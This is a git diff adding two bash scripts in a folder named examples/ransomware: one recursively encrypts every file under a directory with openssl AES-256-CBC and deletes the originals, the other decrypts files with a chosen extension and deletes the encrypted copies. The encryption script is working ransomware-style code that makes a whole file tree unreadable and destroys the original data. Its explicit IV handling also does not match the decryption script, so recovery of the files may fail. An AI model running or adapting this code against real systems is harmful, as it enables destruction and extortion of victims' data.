diff --git a/examples/ransomware/decrypt_files_recursive.sh b/examples/ransomware/decrypt_files_recursive.sh new file mode 100755 index 0000000..375da4e --- /dev/null +++ b/examples/ransomware/decrypt_files_recursive.sh @@ -0,0 +1,43 @@ +#!/bin/bash + +# Check if the correct number of arguments is provided +if [ "$#" -ne 3 ]; then + echo "Usage: $0 " + exit 1 +fi + +folder="$1" +password="$2" +extension="$3" + +# Ensure the directory exists +if [ ! -d "$folder" ]; then + echo "Directory $folder does not exist." + exit 1 +fi + +# Find all files with the specified encrypted extension in the directory and subdirectories +find "$folder" -type f -name "*.$extension" | while read -r file; do + # Skip if the file does not exist or is unreadable + if [ ! -r "$file" ]; then + echo "Skipping unreadable file: $file" + continue + fi + + # Extract the original filename by removing the .encrypted extension + dirpath=$(dirname "$file") + filename=$(basename "$file" ".$extension") + original_file="$dirpath/$filename" + + # Decrypt the file + echo "Decrypting $file to $original_file" + if openssl enc -d -aes-256-cbc -in "$file" -out "$original_file" -k "$password" -pbkdf2; then + # If decryption is successful, remove the encrypted file + rm "$file" + echo "Decrypted and removed $file." + else + # If decryption fails, print an error message + echo "Failed to decrypt $file." + fi +done + diff --git a/examples/ransomware/encrypt_files_recursive.sh b/examples/ransomware/encrypt_files_recursive.sh new file mode 100755 index 0000000..7f86688 --- /dev/null +++ b/examples/ransomware/encrypt_files_recursive.sh @@ -0,0 +1,55 @@ +#!/bin/bash + +# Check if the correct number of arguments is provided +if [ "$#" -ne 3 ]; then + echo "Usage: $0 " + exit 1 +fi + +folder="$1" +password="$2" +extension="$3" + +# Ensure the directory exists +if [ ! -d "$folder" ]; then + echo "Directory $folder does not exist." + exit 1 +fi + +# Generate a unique initialization vector (IV) for each file +generate_iv() { + openssl rand -hex 16 +} + +# Find all files in the directory and subdirectories +find "$folder" -type f | while read -r file; do + # Skip if the file does not exist or is unreadable + if [ ! -r "$file" ]; then + echo "Skipping unreadable file: $file" + continue + fi + + # Extract filename and extension + filename=$(basename "$file") + dirpath=$(dirname "$file") + base_name="${filename%.*}" + ext="${filename##*.}" + + # Define the output file path by appending .encrypted to the original extension + output_file="$dirpath/${base_name}.${ext}.${extension}" + + # Generate a unique IV + iv=$(generate_iv) + + # Encrypt the file + echo "Encrypting $file to $output_file with IV $iv" + if openssl enc -aes-256-cbc -salt -in "$file" -out "$output_file" -k "$password" -iv "$iv" -pbkdf2; then + # If encryption is successful, remove the original file + rm "$file" + echo "Encrypted and removed $file." + else + # If encryption fails, print an error message + echo "Failed to encrypt $file." + fi +done +